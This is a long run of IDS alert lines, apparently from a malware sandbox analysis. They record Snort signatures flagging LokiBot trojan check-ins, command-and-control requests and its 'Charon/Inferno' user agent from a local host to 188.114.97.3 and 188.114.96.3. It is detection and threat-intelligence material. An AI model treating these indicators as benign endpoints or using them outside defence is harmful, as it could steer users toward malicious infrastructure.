                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49761 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49761 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49762 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49762 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49763 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49763 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49763 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49763 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49763 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49764 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49764 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49764 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49764 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49764 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49766 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49766 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49774 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49774 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49774 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49774 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49774 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49777 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49777 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49777 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49777 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49777 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49778 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49778 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49778 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49778 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49778 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49780 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49780 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49780 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49780 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49780 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49782 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49782 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49782 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49782 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49782 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49785 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49785 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49785 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49785 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49785 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49786 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49786 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49786 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49786 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49786 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49788 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49788 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49788 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49788 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49788 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49789 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49789 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49789 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49789 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49789 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49790 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49790 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49790 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49790 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49790 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49791 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49791 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49791 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49791 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49791 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49792 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49792 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49792 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49792 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49792 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49793 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49793 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49793 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49793 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49793 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49794 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49794 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49794 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49794 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49794 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49795 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49795 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49795 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49795 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49795 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49796 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49796 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49796 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49796 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49796 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49797 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49797 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49797 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49797 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49797 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49798 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49798 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49798 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49798 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49798 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49800 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49800 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49800 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49800 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49800 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49805 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49805 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49805 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49805 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49805 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49811 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49811 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49811 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49811 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49811 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49817 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49817 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49817 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49817 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49817 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49823 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49823 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49823 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49823 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49823 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49828 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49828 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49828 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49828 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49828 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49830 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49830 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49830 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49830 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49830 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49832 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49832 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49832 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49832 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49832 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49838 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49838 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49838 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49838 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49838 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49840 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49840 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49840 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49840 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49840 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49843 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49843 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49843 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49843 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49843 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49850 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49850 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49850 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49850 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49850 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49852 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49852 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49852 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49852 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49852 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49853 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49853 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49853 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49853 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49853 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49859 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49859 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49859 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49859 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49859 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49867 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49867 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49867 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49867 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49867 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49875 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49875 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49875 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49875 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49875 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49879 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49879 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49879 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49879 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49879 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49881 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49881 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49881 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49881 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49881 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49882 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49882 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49882 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49882 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49882 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49883 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49883 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49883 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49883 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49883 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49884 -> 188.114.96.3:80
